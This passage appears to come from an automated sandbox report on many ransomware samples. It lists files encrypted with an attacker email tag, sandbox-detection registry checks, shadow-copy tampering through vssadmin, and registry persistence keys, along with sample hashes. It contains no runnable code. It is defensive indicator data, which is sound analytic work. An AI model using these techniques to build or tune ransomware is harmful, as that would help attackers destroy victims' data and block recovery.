Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Advanced-Light.scale-125.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-3x.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fr-fr\ui-strings.js Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\it_get.svg.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\Weather_SplashScreen.scale-100.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\ScreenSketchWide310x150Logo.scale-100_contrast-white.png Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\UIAutomationClient.resources.dll.id-DD34E558.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\desktop.js Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe -
Drops file in Windows directory 3 IoCs
Processes:
dw20.exemsiexec.exedescription ioc process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe File created C:\Windows\Installer\e5a9e74.msi msiexec.exe File opened for modification C:\Windows\Installer\e5a9e74.msi msiexec.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 3 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
Processes:
cmd.execmd.execmd.exedescription ioc process File created C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe:Zone.Identifier cmd.exe File created C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier cmd.exe File opened for modification C:\Users\Admin\Desktop\00381\HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe:Zone.Identifier cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
Program crash 8 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5096 1468 WerFault.exe Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe 448 3620 WerFault.exe Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe 6660 5056 WerFault.exe Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe 5528 3628 WerFault.exe Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe 5704 8252 WerFault.exe Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe 8384 10312 WerFault.exe Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe 8236 11868 WerFault.exe Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe 14260 10936 WerFault.exe Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.execmd.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exeTrojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exenslookup.exeYandexPackSetup.exeTrojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exeTrojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exeTrojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exeTrojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exeschtasks.exeTrojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exenetsh.exenslookup.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exedw20.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exenslookup.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exeTrojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exeTrojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeHEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exeTrojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exeTrojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exeschtasks.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exeHEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exeTrojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exeTrojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exenslookup.exeTrojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.execmd.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exeicacls.exeHEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exeTrojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.execmd.exey_installer.exey_installer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Crypmod.gen-57358385c4878e612c40af007a27ad7c1bfcd106a0fd07237fe5a8e0681bcd53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.lv-3b2deafb0e27a340ed84d416e18f13f98ae4d685aa98d1ee1ad66f7e6c2d273b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language YandexPackSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.lckf-2cb4c4a2a358164b88c5aa95c9147115fccfc837d70a42ee46787fbf59b15590.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mobk-22bfc2d64bd801bf496a4b8d1172bccfe65a1d837ccdde4b3d8cc6866bb2de50.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Lockbit.p-0a937d4fe8aa6cb947b95841c490d73e452a3cafcd92645afc353006786aba76.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.ba-40ce070f8d58d68aedfca96e572f146d5416edbc4103dc8025bca94880e2a103.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Stop.mr-2afa5929643add75465fb583e519d5f5bd0d61e75b15382aafd6980eadc79a7e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Agent.gen-4c530892b2c36a9360cca19a35209ce9efb711ad6a77416863b373f5d566325e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dw20.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-650d7694ca81aa2e509dff3bc7811494ca67eaf9c9946e3834961a9f136c0dcf.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Encoder.gen-90f4f8acc746dc34c04895670261264d48fbf61330b7b2b6a90cef73e81f3a29.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jfg-5cd57d70b048fa751d8d093614cb86096567958778c7bd99ac6ff0355b699d19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.g-3fdad99a17a6766fe396081f82394f5e2da0142651427da64a5b6e28c9df2fd4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Crusis.gen-d3fed0901b9b351ac22e1bc86b11025dc3f5d1d125d62fef7393c082b2f4a472.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crypmod.adhb-b191182918879be7a23e08840a6e92a1c71217aa0454705b472dd249d5f1c464.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.aak-3cff33197edc918d47d08f44d6ddbdda157337f0ad58288d15746cf72c0e4c57.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.PolyRansom.gen-331e9281187b3f0ea84754232f906ba87a0f8469d71b461efc500c05bbdd32a2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Stop.vho-9920743ff1e3b5114faa0741f769cc34de11a28b71a065ff59ff84b58d3dc5d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dil-fee45eff4c43b338decaf3e0e69d263a46fe4cea12965bc1c015ed3aa69ad3ce.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Crusis.dsy-a0ce2a605706591bbbdeee345fcde145e88ea0172143068ae78f949d37d258e8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Sodin.abd-74d6a5acee6c8836de88c9bea92c3d785d521cdee91abaf272c2a2c81b30c09c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Foreign.gen-e6b59691fd4ebe8404b6da88136ad1fbb25e81d325b887266649830459500a34.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language y_installer.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid process 11536 PING.EXE 10296 cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
System Time Discovery 1 TTPs 1 IoCs
Adversary may gather the system time and/or time zone settings from a local or remote system.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exetaskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
dw20.exeTrojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Trojan-Ransom.Win32.GandCrypt.jdv-1eca8a25be694ecc09679c91e416b1b3ac1d4d0af8f0a35dce437fda4b70ab9e.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
dw20.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
Interacts with shadow copies 3 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 2396 vssadmin.exe 2164 vssadmin.exe 13224 vssadmin.exe 1224 vssadmin.exe 7956 vssadmin.exe -
Modifies data under HKEY_USERS 23 IoCs
Processes:
Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-19\Software\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\.DEFAULT Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\.DEFAULT\Software Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-19 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-19\Software\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-19\Software Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\AppDataLow Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\AppDataLow\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-20\SOFTWARE\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\AppDataLow\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\AppDataLow\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\.DEFAULT\Software\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\.DEFAULT\Software\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20\Software\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\AppDataLow Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20\Software Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-20\Software\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-19\SOFTWARE\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe -
Modifies registry class 6 IoCs
Processes:
Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software\AppDataLow\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software\AppDataLow Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Key created \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software\X1gcJOZl Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software\AppDataLow\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe Set value (data) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000_Classes\Software\X1gcJOZl\ZiUv57F8 = 58229954d24a1ef4ee88c1c7408b09cefb129a199bce76bc190d2f0149f74c28f999ad4aff1399d994c4234e0d2f8443cd3b5e017ebf7030101c9db14ba1596f0100000000000000 Trojan-Ransom.Win32.SageCrypt.eqr-8613961e2c740362affcdb877363b14714fb72b20dd36acd70aceb1cf4be535b.exe -
Processes:
